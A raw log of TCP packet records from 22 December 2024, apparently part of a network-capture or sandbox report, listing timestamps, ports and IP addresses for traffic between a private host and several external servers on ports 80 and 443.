Dec 22, 2024 02:16:22.880858898 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.880902052 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.881737947 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.881784916 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.881803036 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.881848097 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.882759094 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.882802963 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.882929087 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.882970095 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.883580923 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.883620977 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.883702040 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.883747101 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.884506941 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.884551048 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.027363062 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.027445078 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.027551889 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.027606964 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.027785063 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.027826071 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.027890921 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.027931929 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.028723001 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.028764963 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.028832912 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.028873920 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.029599905 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.029647112 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.029716969 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.029756069 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.030575037 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.030616045 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.030647993 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.030689001 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.031498909 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.031543970 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.031627893 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.031672955 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.032454967 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.032505989 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.032572031 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.032619953 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.033401966 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.033449888 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.033515930 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.033560991 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.034357071 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.034405947 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.034411907 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.034456015 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.035293102 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.035343885 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.035410881 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.035460949 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.036243916 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.036294937 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.036355972 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.036402941 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.037187099 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.037231922 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.037297964 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.037353039 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.038140059 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.038188934 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.038253069 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.038301945 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.039076090 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.039124966 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.039134026 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.039186954 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.040007114 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.040051937 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.040117979 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.040162086 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.040946007 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.040992022 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.041057110 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.041109085 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.041932106 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.041990042 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.042026997 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.042074919 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.042850971 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.042896032 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.042960882 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.043005943 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.043776035 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.043826103 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.043891907 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.043945074 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.044733047 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.044775009 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.044842005 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.044893026 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.045665979 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.045716047 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.045753956 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.045795918 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.046597004 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.046648026 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.046725035 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.046772003 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.047558069 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.047606945 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.047672033 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.047713041 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.048516035 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.048567057 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.048639059 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.048690081 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.049468040 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.049511909 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.049585104 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.049632072 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.050381899 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.050425053 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.050489902 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.050539970 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.051351070 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.051392078 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.051455021 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.051511049 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.052320004 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.052366972 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.052377939 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.052416086 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.053220034 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.053267002 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.053328037 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.053370953 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.054152012 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.054203987 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.054255009 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.054301977 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.055104017 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.055147886 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.055228949 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.055272102 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.056045055 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.056090117 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.056169987 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.056224108 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.056988001 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.057037115 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.057094097 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.057140112 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.057944059 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.057986021 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.058099031 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.058142900 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.058876991 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.058928013 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.059011936 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.059058905 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.059823990 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.059879065 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.059950113 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.059993982 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.060822964 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.060873032 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.060951948 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.060997963 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.061713934 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.061764956 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.061769009 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.061806917 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.062731981 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.062777042 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.062786102 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.062832117 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.063623905 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.063663006 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.063731909 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.063776970 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.064594030 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.064646006 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.064713955 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.064760923 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.065495968 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.065545082 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.065613985 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.065665007 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.066464901 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.066513062 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.066577911 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.066621065 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.067384005 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.067434072 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.067563057 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.067605019 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.068330050 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.068382025 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.068449020 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.068523884 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.069269896 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.069320917 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.069389105 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.069442034 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.070202112 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.070245981 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.070312023 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.070352077 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.071154118 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.071202040 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.071649075 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.071697950 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.072113991 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.072164059 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.072223902 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.072273016 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.073081970 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.073128939 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.073210001 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.073256969 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.074023008 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.074068069 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.074145079 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.074198008 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.074904919 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.074943066 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.075009108 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.075053930 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.075875998 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.075922012 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.075959921 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.076004028 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.076735973 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.076786995 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.219971895 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.220046043 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.220047951 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.220063925 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.220084906 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.220105886 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.220444918 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.220484972 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.220721960 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.220760107 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.220834970 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.220873117 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.221652985 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.221689939 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.221708059 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.221745968 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.222593069 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.222635031 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.222708941 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.222752094 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.223551989 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.223596096 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.223648071 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.223687887 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.224498034 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.224540949 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.224606037 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.224642992 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.225431919 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.225481987 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.225544930 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.225581884 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.226402998 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.226440907 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.226510048 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.226547956 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.227324963 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.227361917 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.227437973 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.227478027 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.228274107 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.228312016 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.228401899 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.228440046 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.229209900 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.229254007 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.229321003 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.229356050 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.230232000 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.230304003 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.230349064 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.230395079 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.231122971 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.231167078 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.231245041 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.231288910 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.232074976 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.232117891 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.232183933 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.232227087 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.233004093 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.233050108 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.233130932 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.233174086 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.233966112 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.234010935 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.234074116 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.234116077 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.234894037 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.234932899 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.235014915 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.235059023 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.235826969 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.235868931 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.235934019 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.235974073 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:23.236816883 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:23.236855984 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:25.683794975 CET	49785	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:25.684300900 CET	49802	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:25.803898096 CET	80	49802	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:25.803967953 CET	49802	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:25.804241896 CET	80	49785	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:25.804297924 CET	49785	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:25.827198982 CET	49802	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:25.946696043 CET	80	49802	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:27.157696009 CET	80	49802	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:27.157819033 CET	49802	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:27.171487093 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:27.171791077 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:27.291425943 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:27.291466951 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:27.291495085 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:27.291527033 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:27.292627096 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:27.412148952 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:27.895132065 CET	49806	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:27.895227909 CET	443	49806	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:27.895332098 CET	49806	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:27.898329020 CET	49806	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:27.898366928 CET	443	49806	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:28.617867947 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.617891073 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.617911100 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.617934942 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.617968082 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.618005037 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.618022919 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.618040085 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.618062973 CET	49804	80	192.168.2.4	31.41.244.11
